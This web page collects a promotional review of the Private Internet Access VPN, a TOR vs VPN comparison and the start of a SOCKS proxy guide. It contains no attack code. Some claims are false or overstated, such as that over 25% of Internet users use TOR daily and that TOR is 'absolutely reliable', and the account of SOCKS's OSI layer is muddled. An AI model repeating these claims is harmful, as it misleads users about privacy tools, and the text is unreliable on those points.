Although it may not be the most beautiful VPN client out there, the sign-up and install process for PIA is simple, and the website is nice enough to make the signup and client installation an easy-to-follow process even for novice users. Registration requires only a couple of clicks and an email address. PIA takes care of the password for you, sending your user and login details via those details. You’re also given a link to the client installer for each platform, guides, and a dedicated new user support thread. It’s all fairly fool-proof.

In fact, the install process is so easy that you probably won’t need the support. Users just have to open the file and everything is taken care of. No hitting next, no choosing install locations. A command prompt window opens and installs everything you need.

pia vpn client settings

PIA VPN Client has a simple, yet effective, interface with plenty of useful options

Despite the client’s simplistic design, it does provide all the functionality you need in an easy-to-use interface. Connecting to a VPN server can be managed straight from the system tray, and right-clicking offers more options. Its usability is up there with the Best VPNs Review.

VPN Client Platform Availability

This ease of use extends to most of the major platforms. PIA has a Windows and Mac OSX client, as well as an app for iPhone, iPad, and Android smartphones/tablets. Platforms like Windows Mobile do not have a dedicated client, but can utilize the less secure L2TP protocol via settings. In general, we found the apps easy to use, more so than the desktop client. They have a modern GUI and the ability to start the VPN in one click. Without doubt PIA has one of the best VPN apps out there on the mobile platform.

pia vpn client mobile platform

PIA Mobile VPN Client – Great features and easy to use

There’s also support for Linux, although the complexity depends on distribution. Ubuntu 12.04+ is the most supported, and has a dedicated installer that can be run through terminal:

pia linux vpn client

The PIA Linux VPN Client installation process and login

Most other distributions can install PIA via package manager commands. The exact ones depend on the version of Linux but, generally, it looks something like this:

pia linux openvpn client installation

PIA OpenVPN Client Installation

However, some users are subject to restrictive network policies, causing issues with the dedicated Linux VPN client. In this case, they must use the standalone OpenVPN client. On Linux, this is a bit complex. Though PIA doesn’t have a dedicated support thread, a forum post details the steps for various Debian distributions. It would be good to see a bit more support, but the OpenVPN application isn’t controlled by PIA so it’s forgivable.

pia openvpn client login

PIA OpenVPN (Windows) Client Login

Windows users have an easier time of things. They can use the OpenVPN client by following this guide. All it takes is a simple installer and a configuration file. Naturally, you will not have access to the best VPN features like DNS leak protection, a kill switch, and PIA MACE (Analysed below). However, it does offer a fast VPN service that can bypass network restrictions.

Router VPN Support

Some users find it easier to set up a VPN on their router rather than running VPN clients on every machine. This way, all connections on the network are encrypted by default. Unlike some other VPN providers, PIA does not offer a dedicated application/firmware that users can load on compatible hardware routers but this can be easily overlooked as PIA is fully compatible with open source alternatives such as DD-WRT, Tomato router software and even PfSense.

pia tomato vpn setup

PIA Tomato VPN setup

Private Internet Access team has extensive guidance on this and all three solutions use OpenVPN. It isn’t the easiest process, but it’s possible with a little effort.

Privacy, Security and Encryption

With a name like Private Internet Access, you would expect PIA to have considerable security. Fortunately, it does live up to its name. It supports PPTP, OpenVPN, and L2TP/IPSec encryption methods. These each have advantages and disadvantages, as stated in our beginner’s guide to VPNs.

By default, PIA utilizes OpenVPN, which is standard for all the best VPNs. Users can choose between AES-128 level encryption and the slower, more secure AES-256. They can also choose between SHA-1 and SHA-256 data authentication, and various handshake methods. You can customize PIA to give maximum protection, none, or somewhere in the middle. Combined with the variety of platforms, these features ensure users can stay safe even on public WiFi.

Private Internet Access also tries to mitigate other security issues. A dedicated PIA MACE setting blocks information leaks due to ads, trackers, and malware. MACE uses a custom DNS server so that requests from unwanted domains return an incorrect IP address. This is a step further than many providers.

PIA also promotes a Kill-Switch feature. When the VPN cuts out or drops, the client disables a user’s internet connection. This is so their real identity is never revealed. What’s more, it reconnects automatically after sleep mode – a handy feature not found on many VPN clients. Although PIA previously had issues with the VPN Auto-Connect feature, this has been resolved in the latest release.

DNS leak worries are addressed too, via a dedicated toggle. Often, OS issues cause a user’s IP address to become public through the Domain Name System. PIA has taken the time to resolve this, despite it being more of an OS issue than a VPN one.

IPv6 leaks are another concern, and the PIA client has protection for those. Again, this is optional, and is off by default. If all that’s still not enough, PIA provides a SOCKS5 proxy that can be layered on top of a VPN connection. This provides no extra encryption, but does further obscure the IP address.

DNS Leak Protection Test

Unfortunately, you can’t always trust what VPN providers put on their websites. Where possible, you should do independent tests of key features. The best VPN providers have security teams consistently testing for vulnerabilities. However, gaps in security can still happen without the provider knowing. As a result, we tested PIA’s functionality, starting with DNS Leak Protection.

First, we used DNSleaktest.com to run an advanced test without DNS Leak Protection enabled. We got the following result:

 dns-leak-test-disabled

DNS Leak test without PIA’s DNS Leak Protection enabled

The test returned the IP address of the VPN server (Choopla) and our IP address 81.139.58.46 (British Telecom). No surprises there, our OS wasn’t optimized to stop this.

However, PIA’s DNS leak protection setting is supposed to mitigate that issue. With the setting enabled, DNSleak.com came back with this:

dns-leak-test-enabled

DNS Leak test with PIA’s DNS Leak Protection enabled

This time, only the IP address of the VPN shows up. PIA’s feature seems to work perfectly, giving true anonymous browsing. Just to be sure, we tested again using a different site, cyptoip.info.

Initial test was without enabling PIA’s DNS Leak Protection option:

pia-dns-leak-test-without-protection

Again, the test confirmed there is a DNS Leak as it returned the IP address of the VPN server (Choopla) and our IP address 81.139.58.46 (British Telecom).

Next, we disconnected from the VPN server, enabled DNS Leak Protection in our VPN client and reconnected to the VPN server. Executing the DNS Leak test provided the following results:

 pia-dns-leak-test-protection

Once more, PIA successfully resolved DNS leak issues. Though we can’t vouch for it on every system, it’s a solid indication. To be certain, users should always modify system settings as per our DNS leak guide.

Kill Switch Protection Test

So, PIA’s DNS leak protection is pretty solid. How about the ‘kill switch’ feature? It’s hard to test consistently, but we didn’t run into any problems. Disconnecting from the VPN immediately turns off the Wi-Fi connection and no web pages will load:

 PIA’s Kill Switch blocks internet access when not connected to the VPN

PIA’s Kill Switch blocks internet access when not connected to the VPN

However, this doesn’t mean that no leak is occurring. Even slight delays to block internet traffic might cause our IP address to leak for a couple of seconds. To test further, we monitored for any IP changes during connect and disconnect with ipleak.net. We found the real IP address was not displayed at any point. That’s a definite plus that helps keep your identity hidden.

pia-kill-switch-test

However, it’s worth noting that PIA’s Kill Switch feature does not work if you use more than one network interface. It can also cause connectivity issues in rare cases. You should only use the feature if you need anonymous browsing, and ought to disable any extra network interfaces.

WebRTC Protection Test

Occasionally, VPNs offer protection against WebRTC. For those unfamiliar, WebRTC is a communications protocol that enables video conferencing and file transfer without extra browser plugins. However, a flaw lets websites discover the true IP address of a user even if they’re using a VPN.

With features like PIA MACE, it can be difficult to tell what is included in “tracking protection.” We contacted support, asking what it covers. In regards to WebRTC, we got this reponse:

“WebRTC is a browser issue, not a VPN problem, and not unique to our service. Mace does not protect from WebRTC.”

Our own tests were shaky. Using the Browserleaks test we did confirm a WebRTC connection in unmodified browsers:

pia-webrtc-test

This happens even with PIA’s extra security measures enabled. However, the IP address WebRTC detects seems to point to the VPN server IP, not ours. PIA seems to route STUN requests through its servers to hide the client’s real IP address. So, there does seem to be some protection, but it’s not related to MACE.

However, it’s hard to say how comprehensive this solution is. WebRTC isn’t PIA’s responsibility, as the support agent pointed out. Even the best VPNs can’t substitute for user configuration.

Does Private Internet Access Keep Logs?

PIA provides great security, and it doesn’t lie about its features. Still, this functionality is useless if it keeps logs. A warrant from law enforcement or the NSA and your private data is in the open. This has happened several times, including hidemyass (another VPN provider) in 2011. Private Internet Access claims it does not keep traffic logs and provides true, anonymous browsing.

However, it’s difficult to trust a provider’s word with so much pressure from law enforcement. IN PIA’s case we can be quite certain. Court documents from multiple bomb threats in 2016 show the FBI could get no useful information from PIA (see page 12, section 33).

All of the responses from 1&1, Facebook, Twitter, and Tracfone have been traced by IP address back to a company named London Trust Media dba privateinternetaccess.com. This company is an anonymizing company whose purpose is to allow users of the internet to mask their original IP address where they are sending messages from. A subpoena was sent to London Trust Media and the only information they could provide is that the cluster of IP addresses being used was from the east coast of the United States.

That’s a big endorsement, and shows that PIA is trustworthy. It seems unlikely that the FBI wouldn’t pull all the cards for such a serious threat.

While PIA doesn’t keep traffic logs, it does track some aspects of its website usage. Its privacy policy reveals LTM (Private Internet Access) retains email addresses, payment data, and temporary cookies. It also keeps apache web server logs, anonymous Google analytics data, and credit card protection. It seems the “anonymous browsing” claim does not refer to accessing its website.

However, PIA does seem to use this information in a genuine manner. An email address is essential for payment confirmation, and Apache web server logs are “regularly pruned,” with no usernames or passwords involved. Users can also pay by Bitcoin or connect through TOR if they’re concerned.

Despite the London name, PIA is based in the United States. This means considerable scrutiny from law enforcement and other bodies. However, company lawyer John Arsenault says there’s a backup plan if the climate there goes south. From 2012-2013, the company received eleven requests for user data, three of which were from outside the US. Of those, no user data was disclosed.

Speed Test and Reliability

Alongside its privacy features, we found Private Internet Access to be a relatively fast VPN. From the UK, we used speedtest.net’s San Jose, CA server. Without PIA, we got a download speed of 90.26 Mb/s, an upload of 97.40Mb/s, and 140ms ping (latency).

pia-speed-test-without-vpn

Non-VPN Speed Test with Speedtest.net San Jose

 

A connection with PIA’s closest UK VPN server netted a slight decrease in both download and upload speed:

pia-speed-test-with-vpn

VPN-Enabled Speed Test with Speedtest.net San Jose

Our download speed took close to a 10% hit, and upload fell by 6.42 Mb/s. That’s quite a fast VPN for all the encryption that’s going on. Ping also fell within the expected range.

In all, PIA provided more than acceptable upload and download speeds. London Trust Media has over 3200 servers across 24 countries. That means coverage isn’t much of an issue, though we’d like to see a few more on the list.

We did, however, experience a few problems with reliability. At times, the speed of servers seemed to drop – likely due to high traffic. However, you can lodge speed complaints straight from the client and they may be resolved. Despite its popularity, Private Internet Access was a fast VPN and, although it sometimes slowed, it never cut out completely.

Private Internet Access for Netflix and Region Blocks

Unfortunately, the popularity does come with some other issues. While some of the best VPNs manage to unblock Netflix, PIA is a little shaky. Anonymous browsing comes at a cost, and connecting from a US California server resulted in the well-known streaming error code F7111-1331-5059

Netflix appears to regularly identify and remove IP addresses owned by PIA. However, we did manage to unblock Netflix from the US Texas server:

pia netflix unblocked

The Magicians, not available on UK Netflix.

So, watching Netflix with PIA is possible, but it may take some searching around to find a VPN server that is not blocked by Netflix. It’s a constant battle between any VPN provider and Netflix, and London Trust Media can’t afford to keep buying new servers. Due to legal issues, support agents are not able to help users unblock Netflix, either. That means you’ll have to test each server manually.

This also applies to the local VPN server (in most cases). We couldn’t find a UK server that unblocks Netflix, despite testing from there. As a result, you may have to forego encryption while you watch. Not ideal, but the fault is Netflix’s rather than PIA’s. In Australia, this wasn’t an issue, as the servers haven’t been blacklisted yet. The Usefulness varies depending on country.

Thankfully, the issue is also mostly limited to Netflix. We could access BBC iPlayer with ease from the UK London VPN server. It depends entirely on the service and how strictly they police. However, to fully unblock Netflix, you’ll want to check out our Best VPN Guide.

Private Internet Access for Torrenting

Though London Trust Media doesn’t support the download of illegal content, nothing is done to stop P2P downloads. We enjoyed a great experience downloading several legal torrents. There was a drop of no more than 1 MB/s, and only slight differences in reliability. Our download speeds without VPN were averaging around 8.7MB/s with a drop to 7.7Mb/s after connecting to our PIA VPN.

 utorrent download without vpn

A BitTorrent download with no VPN enabled

 

utorrent downloading with pia vpn

BitTorrent downloading Using Private Internet Access

 Torrent functionality works on all servers and, on “high-risk” ones, PIA routes traffic through a secondary VPN to further hide IP addresses. In addition, PIA keeps no logs, so it can’t comply with requests from copyright holders.

To verify the safety of P2P downloads with PIA, we ran the ipMagnet test, as per our VPN for torrenting guide. Only the VPN provider was shown, proving that PIA can hide the IP address even during P2P. For further safety, PIA provides a SOCKS5 proxy. Though this doesn’t offer encryption, it does give another layer to hide an IP address. You can see the initial, SOCKS5 IP address, followed by the VPN IP when it was disabled:

pia-ipmagnet-test

All of this makes Private Internet Access an excellent option for torrenting. It should also provide anonymous browsing on torrent sites, and bypass ISP throttling on download. $3.33 for fast VPN torrenting is almost a steal.

Support – Response Time and Quality

No service is infallible, and it’s important to have support services in place. PIA no longer offers a 24/7 live chat service, instead opting for an email system. The average wait time is listed as 4-6 hours.

 pia average support response time

However, we found this to be significantly less in practice. In three separate support cases, two received replies in exactly half an hour, and the third around 45 minutes. That may not be as fast as a live chat, but it’s acceptable. This may just be to stop users being impatient if replies aren’t instantaneous.

The quality of support was also good. Responses were a mixture of personalized content and copy-pasted guides for extra information. The agents answered questions clearly, were knowledgeable about the product, and even sent follow up emails.

Unfortunately, PIA does not offer phone call support. This may be an issue if you have an urgent problem, but for anything else email should be fine. There’s also a variety of forum posts and FAQs covering a range of topics, so even that may not be necessary. It’s not the best VPN support around but for most users it will be plenty.

Value for Money

Private Internet Access manages to deliver some of the best value for money in the industry. The subscription is cheaper than most VPN providers at its $3.33US/month based on a yearly subscription. Other tiers are a lot more expensive, six months adding up to $5.99 a month and one month $6.95. However, this is still lower than some of our best VPN providers.

Despite the low fee, users still get a complete service. For less than a coffee each month, you get anonymous browsing and torrenting, good support, and more than enough speed. Though the ability to unblock Netflix is limited, there are a few servers that work and PIA can still dodge most geo-blocking. The free SOCKS5 proxy is another plus, allowing users to trade encryption for speed where needed.

Visit PIA VPN

Summary

You’re also paying for the brand. Not to show-off to your friends, but in its certifications. London Trust Media has been around for ten years now, and is one of the few with tangible evidence to back up its no log policy.

However, if users aren’t happy, PIA does have a seven-day money back guarantee. That should be more than enough time, and refunds are given with no questions asked. Unless Netflix blocking is your biggest use, the value for money is unmatched. That amazing price point is why we named Private Internet Access one of the best VPNs this year.

  • Hits: 24669

The Ultimate TOR vs VPN Guide – How TOR/VPN Works, Comparing Security, Speeds, Advantages and Disadvantages

Tor vs VPN GuideBack then, the Internet was so very young. Those were the times of Windows Maze Screensaver, of the classy Minesweeper, of grey-white MS Paint, and of silvery floppy disks. Gone are those days. Now, after completing its silver jubilee, the Internet has grown to be almost a multiverse of information, every micro-second its network mushrooms like anything. But even maturity comes with its own struggle. This enhanced version of the Internet carries its own privacy concerns.

But not to worry, there are plenty of technologies and software developed to preserve your Internet privacy. TOR and VPN are the popular ones. So, here we explore and share which of the two comes out to be a better way to achieve a superior level of privacy on the Internet.

Before diving deep into the topic, let’s see what’s covered:

What is Internet Privacy?

What if, at all times, someone is keeping an undersea eye on what you browse over Google, always peering into the messages as you chat with other people? Wouldn’t that make you uneasy? This is Internet privacy. That is, whatever information you share, or browsing you do over the Internet, keeps itself only to you, until you want it public.

We continually hear about governments and ISPs spying on users and even other countries, which shows how unsafe the internet is. Thankfully, user awareness on internet privacy is continually improving as more and more users seek out bullet-proof methods to encrypt their communications and protect their online privacy.

How TOR Works

How ToR WorksTOR or The Onion Router is a free, open source software that comes under the development and maintenance of The Tor Project, a non-profit organisation funded by the US Government. TOR enables users to preserve their anonymity over Internet communications.

To download, simply go to www.TORproject.org. There’s two bundles available for downloading, one is Vidalia, which requires a web browser pre-installed on your system. However, the other one, the TOR Browser Bundle, is preferred as it puts TOR directly into your system without you having to fulfil any prerequisites or additional installations.

You can download the necessary files for your operating system by visiting: https://www.torproject.org/download/download.html.en

TOR - Onion Routing

TOR employs Onion Routing, a technology developed in the late nineties by a scientist named Syverson. It works at the TCP Layer of the network, using a multiple hop pathway. Whenever a user sends data across the network, TOR creates a relay of nodes (or hops) that decrypts the data, one layer at a time. This is where the TOR vs VPN battle actually takes off.

The relay of nodes is randomly selected proxy servers from the TOR users’ network. When the data travels from a user to the first node, it decrypts the IP address of the second node. Similarly, when it reaches the second node, it decrypts the IP address of the third node and so on till it reaches the last node. At each node only information about the next node is decrypted, thus maintaining the anonymity of the user over the entire network. When the data packet reaches the exit node, the node there finally decrypts the IP address of the destination server/node.

The following diagram provides an accurate representation of the Onion Routing method described. Like the layers of an onion, each message (the core of the onion) is covered with layers of encryption. Each layer is removed as it is received by a TOR Node (Router) and then forwarded to the next TOR Node (Router):

 How ToR Works- Onion Routing VPN

Figure 1. TOR Onion Routing method. Each layer is removed by each node to reveal the message

The diagram below is another example which shows how data is exchanged within the TOR network to guarantee privacy and make it almost impossible to track where data packets originate from or the final destination:

How data is exchanged in a ToR VPN Network 

How TOR works – Data exchange between TOR nodes and normal non-TOR servers

Note that TOR nodes/users are also able to access normal (non-TOR) websites and hosts in a similar manner.

An example to further clarify the concept: let’s say you want to send a picture to your friend over the internet, without disclosing your location/IP address.

So when you send the picture, what happens is that your phone, i.e. the Client, creates a data packet that comprises two parts: Data Payload and Header. Data Payload contains your message, in this case the picture, while the header carries all the information about the Client’s (your) and recipient’s IP address.

Data transfer process without TOR exposes the sender’s & receiver’s IP address 

Figure 3. Data transfer process without TOR exposes the sender’s & receiver’s IP address

Now, if you are not using TOR, this data packet directly reaches out to your friend (receiver). And, if your friend is an IT person, it will be fairly easy for him to figure out your IP address from the header and thus the location, which you wanted kept private.

However, with TOR, a different scene would play altogether.

With TOR, this data packet from the Client (sender), instead of reaching out directly to the Server (receiver), passes through several proxy servers in between. At each layer, the data packet reveals only as much information as is required to reach the next layer. Thus at each step the data packet unfolds information only about the next node, not about the forthcoming layers. The layers unfold one at a time, to reach the destination Server safely without him knowing your location:

Data transfer via the TOR network guarantees encryption and privacy 

Data transfer via the TOR network guarantees encryption and privacy

This way TOR doesn’t necessarily erase the footprints of the client but makes it less likely for the server to trace the client’s details. TOR’s strength lies in the number of proxies in the relay. These proxies are servers operated by volunteers connected to the TOR Project. So, the more volunteers the stronger the security network of TOR.

How VPNs Work (Virtual Private Networks)

Our comprehensive Guide to VPNs covers everything you’ll need to know about VPNs however we’ll provide an overview as well to make it easier to compare VPNs with TOR.

VPNs were created in to provide security to users sending data across a public network such as the internet.

Unlike TOR, VPN employs the Client-Server technology with a single hop relay. The intermediate node in the relay is called a VPN Server. A VPN Server acts as a proxy server to transmit data between the client and the internet as shown in the diagram below:

Securely accessing the internet via a VPN Service Provider 

Securely accessing the internet via a VPN Service Provider

A VPN Client is usually a computer, laptop or mobile phone with VPN software installed and a VPN Server is generally located at the organization’s office, in the case of a company-private VPN, or at a large data center in the case of a VPN Service Provider.

Only a VPN Client with the right settings (credentials and VPN Server address) can connect to the VPN Server. A VPN Server combines the hardware and software technologies necessary to host and deliver VPN services over the network. The moment a VPN Client sends a message to connect to the VPN Server, the server will request the client to authenticate. If the credentials are correct, the client connects to the server creating an encrypted tunnel between the two endpoints. Data flowing between the client and VPN server is encrypted, thus preserving the client’s anonymity during the communication.

VPN Service Providers allow you, the client, to connect to their VPN Servers located around the world via VPN, thus encrypting your internet traffic to make it almost impossible to monitor and track.

When the client (you) tries to access a resource on the internet, e.g. a website, instead of sending the request directly to the website, which would reveal your IP address and allow the ISP to monitor the session, the request is encrypted and sent to the VPN server. The VPN Server then reaches out to the website by forwarding the client’s request, however, the website sees that the request came from the VPN Server, not the client. This hides the end client completely making it impossible to track where the request originated.

The same process applies whether you are torrenting, sending-receiving emails, browsing websites or downloading content from the internet. One key-point to remember here is that when you authenticate in order to access a service, e.g. email, you are in fact disclosing your identity to the end server, however, your location is not revealed.

VPN Protocols

VPNs offer different layers of security depending on the encryption protocol. There is a number of VPN encryption protocols used today by VPN Providers and each has its advantages and disadvantages.

Selecting the best VPN Protocol for your mobile device or computer can be a daunting task especially for new users but it can be simplified when you understand a few basic concepts.

While our upcoming extensive guide to the Best VPN Protocol will cover this in great depth, let’s take a quick look at the most commonly used VPN protocols:

PPTP - Point to Point Tunnelling Protocol

PPTP stands for Point to Point Tunnelling Protocol. Developed by Microsoft decades ago, PPTP is supported by most operating systems including Windows, MAC, Mobile OS and Android. It is fast but at the cost of weak encryption. This means that a PPTP VPN can be easily cracked and shouldn’t be used when sending or transmitting sensitive information. PPTP also seems to works well on Wi-Fi hotspots.

L2TP/IPsec – Layer 2 Tunnel Protocol / IPSecurity

Layer 2 Tunnelling Protocol and IP Security offers good encryption resulting in heavy CPU processing, thereby decreasing its speed. L2TP is a much better replacement for the older PPTP but users need to be aware that the increased security/encryption comes at the cost of speed.

SSTP – Secure Sockets Tunnelling Protocol

The SSTP protocol is considered a very reliable and easy-to-use protocol. Its advantages include that it will pass through most firewalls, is difficult to block and is natively supported by all Windows platforms from Windows Vista SP1 onwards. Its encryption capabilities are considered moderate and the same applies to its speeds.

OpenVPN

OpenVPN is a newer VPN protocol created and supported by the open-source community. OpenVPN offers the highest level of encryption but, at the same time, is the most flexible protocol available thanks to its ability to utilize the TCP or UDP protocol. It requires a VPN Client and is supported by Windows, Mac and Android Operating Systems. OpenVPN is the preferred VPN protocol as it combines flexibility, encryption and speed. OpenVPN is also the preferred VPN Protocol used by all VPN Providers in our extensive Best VPN review.

When to use TOR

This ‘Dark Onion Science’ prevails. Over 25% of Internet users use TOR daily. That makes the comparison of TOR VPN even more interesting in many ways.

Here are a few examples where TOR can be used, in general:

By Social Workers, Activists & Journalists without Borders

To avoid media censorships while working with sensitive information or secret projects

By Parents & Households

To prevent digital stalking, image abuse and cyber spying.

Law Enforcement Agencies and Military on Undercover Missions

To stay away from the media eye and government hacking/monitoring groups

By Bloggers, Job Professionals or Normal People

To increase their privacy over internet or to simply avoid cyber theft.

Hidden Internet Services

This is a very interesting application of TOR. Hidden Services mean that a client hosts its website or service without disclosing its identity. Here, TOR provides anonymity to websites and other servers. These kinds of websites don’t even have a regular URL address, e.g. www.firewall.cx, instead TOR shows a randomly generated 16-digit code as its domain name. So, if there’s a TOR user trying to access a hidden services website, his browser will identify the domain via public keys and introduction points stored in a distributed hash table in the TOR Network. However, if the user doesn’t have TOR installed, there is no way of accessing these hidden internet services.

Apart from the above mentioned applications, the most common applications that use anonymous internet via TOR are Internet Relay Chat (IRC), Instant Messaging (IM) and World Wide Web (www) browsing.

When to use VPN (VPN Service Provider)

It is without doubt that VPNs are far more popular than TOR, however, let’s take a quick look at the common reasons people prefer to use VPNs:

To Access Restricted Websites – Bypassing Geo-Location Restrictions

Netflix or Hulu are the most common examples here. Users who want to access their Netflix or similar account cannot do so when travelling overseas. With a VPN service you can connect to one of your provider’s VPN servers and access the online content as if you were located in that country – effectively bypassing any geo-location restriction. Another example is trying to access a domain or website that is blocked from your country, e.g. accessing facebook from China.

Our Best VPN Service Provider comparison also includes VPN Providers that provide access to Netflix and Hulu.

For Downloading via Torrents & Avoiding Bandwidth Throttling

Torrent downloading implies downloading illegal or pirated software, however, this is not 100% true. Many vendors offer legal downloading of their software via Torrents. ISPs unfortunately tend to “unofficially” throttle user bandwidth when they detect Torrent traffic. Using a VPN, all traffic is encrypted therefore there is no bandwidth throttling by the ISP.

Secure Mobile Device Internet Data

Users tend to use their mobile devices today to access all sorts of content while commuting to work, casually surfing the internet or checking their bank accounts. No matter what the activity, with a VPN Service Provider that supports mobile clients users are sure that all their data and activities are encrypted and protected.

Authenticating to Websites or Private Resources (Email, Internet Banking etc)

When you are signing in with your credentials to an online resource, it’s always better to protect yourself from crawler bots and cyber fraud artists. A VPN will ensure your traffic is encrypted so anyone monitoring your traffic (e.g. at a public hotspot) won’t be able to see the data that is being transferred.

On Travel or Business

On the road, or at a hotel, VPNs are just the right thing if you travel. VPNs help bypass any firewall restrictions providing full internet access no matter where you might be.

TOR vs VPN: TOR Advantages and Disadvantages

Advantages Include:

High Level of Anonymity

TOR gives you such a high level of anonymity it is almost impossible for a website to track you. The Onion Routing technology leaves no way through which your pathway can be tracked.

Free To Use

TOR is completely free!

Reliable

Unlike VPNs where your privacy depends on how trustworthy your VPN Service Provider is, TOR is absolutely reliable. Owing to the randomly selected network of nodes, no one knows about the other and thus there is no concern about reliability here.     

Disadvantages include:

Non Traceable Exit Nodes

Since the data packets at exit nodes are decrypted, whoever is running the exit node can misuse, leak or manipulate the information sent by you.

Blocked Relays

Some relays are cleverly tracked and blocked by the ISPs. This can cause real difficulties in connection between users.

Slow Processing

Since the data packets route through a number of proxy servers, the connection can be slow. This can cause irritation while watching or downloading large files like videos.

Unsuitable for Data-metered Plans

If your internet plan includes a specific amount of data, e.g. 10GB/month, TOR can become a big problem as your bandwidth will be used by other TOR nodes to transfer their data. This will result in quickly depleting your monthly data allowance.

TOR vs VPN: VPN Advantages and Disadvantages

Advantages include:

Variety of Security Encryption Levels Depending on your Online Activities

Whether you need to access your email, download torrents, stream videos, perform internet banking transactions or anything else, you can easily select the encryption level and help speed up the connection, or heavily secure it.

Compatible with Almost Any Device

VPNs are compatible with almost any iPhone and android device, Windows operating system or MAC OS. Tablets including iPad are also capable of running VPN client software. This makes it very easy for novice users to install a VPN client and securely connect to the internet.

Fast Speed

From multiple to just one proxy/node  automatically increases the speed of data transmission in VPNs compared to that of TOR. This makes it highly suitable for torrenting or downloading large files. VPNs also allow you to select the server to which you connect - an option that considerably speeds up the overall download speeds one can acheive via a VPN connection.

Easy Availability, Installation and Support

Unlike TOR, VPNs are easily allowed and operated by commercial companies that ensure fast and good quality services for their clients. If you have any problem there is almost always someone at the support desk that can help you via email or live chat.

Ability to bypass Firewall Restrictions

With the use of a VPN you can pretty much bypass any protocol or URL restriction in place, effectively opening the internet to your device.

Disadvantages:

Despite the many advantages of VPNs, there still remains a fly in the ointment. Since information just passes in and out of the tunnel, companies operating the VPNs have access this information. The best way to protect yourself from your VPN Provider is to ensure they have a no-log policy which means they do not log any data or user activity on their VPN Servers. Our Beginners Guide to VPNs article provides all the necessary information new or existing VPN users need, including security concerns and VPN features that help enhance your protection.

TOR vs VPN: Summary

So, the comparison comes out like this: use TOR, or use VPN, each one of them has its own pros and cons. Both are good as long as you understand your needs, the level of anonymity you want over the Internet and at what price. It can cost your time and money. If you want to secure your Internet privacy, TOR is a great option if you have a fast and unmetered (unlimited bandwidth) connection. If you need fast downloading speeds, to bypass any firewall restrictions or just greater flexibility and better control of how you consume your monthly data plan, then a VPN is your solution.

In the comparison of TOR vs VPN, the user is the winner. And to the hackers and government agencies all we can say is, no snooping around!

  • Hits: 29125

Complete Guide to SOCKS Proxy - How to Securely Bypass Blocks, Safe Torrenting, Free Proxy List, Anonymous Proxies, Access Restricted Content

Socks ProxyThe internet is in a strange place right now. It’s no longer the open, free place it used to be. Increasingly, users are being subject to website blocks, attacks, and surveillance. For true safety or anonymity, precautions must be taken. Thankfully, there many ways for you to protect yourself, one of them being Socket Secure (SOCKS) proxies.

While many have heard about SOCKS Proxies not many truly understand their purpose, how they work and the security-privacy levels they can offer. SOCKS proxies are often mistakenly considered an alternative or equivalent to VPNs causing major confusion amongst users and providing false sense of security.

In this article we'll be covering a wealth of topics relating to SOCKS Proxies, SSL, Configuration advise, Torrenting via SOCK, compare them with VPNs and much more so let's take a quick look at what we have in store before diving deeper:

Introduction To SOCKS Proxies

Like HTTP, SOCKS is an internet protocol, but it offers a further degree of anonymity. Connecting to a SOCKS proxy routes your traffic through a third-party server via TCP, assigning you a new IP address in the process. Because the IP address is different, web hosts can’t determine the physical location.

This has the add-on effect of bypassing regional filtering. However, unlike a VPN, SOCKS doesn’t provide encryption. This means users don’t have true privacy and aren’t safe from attacks on Public WiFi and government surveillance. In addition, SOCKS doesn’t run through every application, meaning regular browsing is not always safe.

However, this lack of encryption does provide some benefits. The main one is speed. A SOCKS proxy doesn’t need resources to encrypt traffic and has far less overhead, so it’s usually faster than a VPN. Though proxies don’t provide protection from monitoring, they are a nice middle ground between HTTP and VPNs.

The security of a SOCKS proxy also depends on the version it utilizes. Most modern proxies use either SOCKS4 or SOCKS5 to protect users, and there are some fundamental differences. As you would expect from a lesser version, SOCKS4 has fewer features.

One example is the lack of support for UDP protocol-based applications. This cuts out programs that need faster, more efficient transfers, like games. SOCKS5 also supports IPv6 and Domain Name Resolution. This means the client can specify a URL rather than an IP address. This feature is also supported by SOCKS4a.

As well as SOCKS, users can utilize the HTTP/HTTPS proxy method. HTTP proxies work similarly to SOCKS5, but utilize the HTTP protocol instead. This is the same method that transfers data to your computer when you type https://www.firewall.cx. These proxies fetch and receive primarily in HTTP and are generally used for web browsers. Some applications support HTTP proxy, others SOCKS proxy, and many both. HTTP is more intelligent than SOCKS5, but also less secure.

Due to lack of UDP support and limited TCP support, HTTP proxies don’t fully support torrenting. Often, they will filter out this type of data or block it. This blocking is especially prevalent in public HTTP proxies. In addition, HTTP tries to re-write the headers of the data in transit. The result is extremely slow or non-existent torrenting.

Understanding How HTTPS Encryption - SSL & HTTPS Proxies Work

HTTPS proxies utilize something called the Secure Socket Layer. In your browser, you’ll notice this as a green padlock next to the URL bar:

https enabled website - green lock

In short, SSL creates a secure connection between the web server and the user’s browser. When you request a URL, the server sends your browser a copy of its SSL certificate. The browser verifies that it’s authentic, and the server then sends back a signed acknowledgment. Upon arrival, both start an SSL encrypted session and can share data safely.

This encryption uses a method called public key cryptography. A server using SSL has both a public key and a private key. When a server first negotiates an SSL session with a client, it sends a copy of its public key. The client’s browser verifies the certificate and then uses the public key to create a symmetric key which is then sent to the server. The private key is never sent and always kept secret.

How HTTPS & SSL works

The symmetric key is unique to the SSL session and used to encrypt/decrypt data exchanged between the client and server.

HTTPS proxy works slightly differently. Using the CONNECT method, requests are converted to a transparent tunnel. However, this feature isn’t available in a lot of proxies and, when it is, users can still be vulnerable.

Some versions of SSL are still open to attack through the Heartbleed bug. This serious vulnerability was discovered in 2014 and allows attackers to steal private keys from servers, eavesdropping on communications and gaining access to passwords, emails and instant messages. Vulnerabilities in SSL and its predecessor TLS have been found several times since then, including man-in-the-middle attacks that downgrade the user to a less secure version.

How SOCKS5 Proxy Works

While an HTTP proxy is designed to work in the web browser, a SOCKS5 proxy is more wide-reaching. SOCKS sits on the higher levels of the OSI model, below SSL, which sits on the seventh application layer, and above TCP and UDP on the transport layer (Layer 4). This offers several advantages. TCP works by forming a physical connection between the client and the server, trying to guarantee that every packet arrives at the destination in the same order it was sent. To do this, it puts all the content into a fixed format.

Another use of UDP is in the Domain Name System (DNS), which allows for translation of URLs into IP addresses. The combination of both TCP and UDP creates a more flexible and reliable experience.

The low level of SOCKS5 also means it can handle several different request types: HTTP, HTTPS, POP3, SMTP and FTP. As a result, SOCKS5 can be used for email, web browsing, peer-to-peer and more. More importantly, users can do this in a somewhat anonymous fashion.

When you connect to a website, the traffic usually runs through a firewall on the router or by the ISP. A SOCKS5 proxy routes your data through its proxy server, creating a path through the network’s firewall. In doing so the user is assigned an IP address, which makes it look like they’re browsing from a different location and protects their identity.

